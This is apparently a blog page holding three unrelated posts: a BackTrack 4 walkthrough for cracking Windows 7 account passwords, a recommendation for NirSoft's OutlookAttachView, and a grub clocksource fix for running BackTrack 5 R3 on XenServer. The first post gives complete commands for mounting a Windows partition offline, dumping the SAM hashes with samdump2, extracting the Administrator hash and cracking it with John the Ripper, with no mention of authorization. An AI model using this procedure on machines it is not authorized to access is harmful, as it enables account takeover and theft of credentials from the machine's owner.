1. Boot the system with backtrack4 and wait for the operating system to load. Use "startx" command to get the desktop. 2. Open the Konsole and use the command "fdisk -l" to know the details of your partition. The partition sda stands for sata type and hda stands for ide. 3. Create a directory say
"mkdir /mnt/sda2"
4. Mount your device parition to the directory
"mount -t ntfs /dev/sda2 /mnt/sda2"
where /dev/sda2 is the your windows7 operating system partition. 5. change the directory to the location "SAM" file where the passwords hashes of windows operating system is present.
"cd /mnt/sda2/Windows/System32/config"
6. Use the tool "Samdump" to move the hashes from the SAM file to the file "pass1"
"samdump2 system sam > /root/pass1"
7. using the "grep" command search the Administrator hash in the file and write it to another file "pass2"
"cat /root/pass1 | grep Administrator > /root/pass2"
8. Change the directory to /pentest/password/jtr
"cd /pentest/passwords/jtr"
9. Type ./john to see the format and various options of cracking. 10. Here windows use the NTLM hash so we use the following command to crack it.
"./john --format=NT /root/pass2"
Full credit goes to Nir Goldshlager
Windows only: Email attachment searching utility OutlookAttachView has a killer feature: You can export or delete multiple attachments at once—so you can finally get your files out of your inbox.
The Options -> Show Inline Attachments checkbox is probably a good idea if you get a lot of embedded pictures through email, as they aren’t stored as regular attachments in Outlook. Once you’ve selected the attachments you want to handle, use the File menu to copy the attachments to a folder, and then you can even delete the attachments in bulk to save a ton of space in your mailbox.
This application even works if you’re on an Exchange Server!
Download: http://www.nirsoft.net/utils/outlook_attachment.html
I’m using this application to download all security camera CCTV email attachments.
Installing Backtrack 5 R3 (BT5) on XenServer 5.6 is a little tricky. Every time you try to boot BT5 you get a blank screen. This is due to a panic caused by the default clocksource in BT5.
You must change your boot options to
clocksource=jiffies
For BT5 to boot.
Your changes are not permanent though. Install BT5R3 to disk. Reboot and don’t forget to set the clocksource to jiffies again. Now modify your grub options to include your clocksource changes.
nano /etc/grub.d/10_linux
Look for “Found initrd image” Below that look for “linux_entry “${OS}” “${version}” false \”
modify the next line with “${GRUB_COMLINE_LINUX}” and add “clocksource=jiffies” inside the quotes at the end of the line.
Your line should look like
“${GRUB_CMDLINE_LINUX} ${GRUB_CMDLINE_EXTRA} ${GRUB_CMDLINE_LINUX_DEFAULT} clocksource=jiffies” \
Now run
update-grub
View /boot/grub/grub.cfg to ensure the changes are there.
nano /boot/grub/grub.cfg and find your changes
Now you can boot your BT5R3 backtrack install on xenserver
Or if you would like to download the backtrack appliance for xenserver I created:
Download Backtrack 5 R3 XenServer Appliance – BT5 xensever appliance
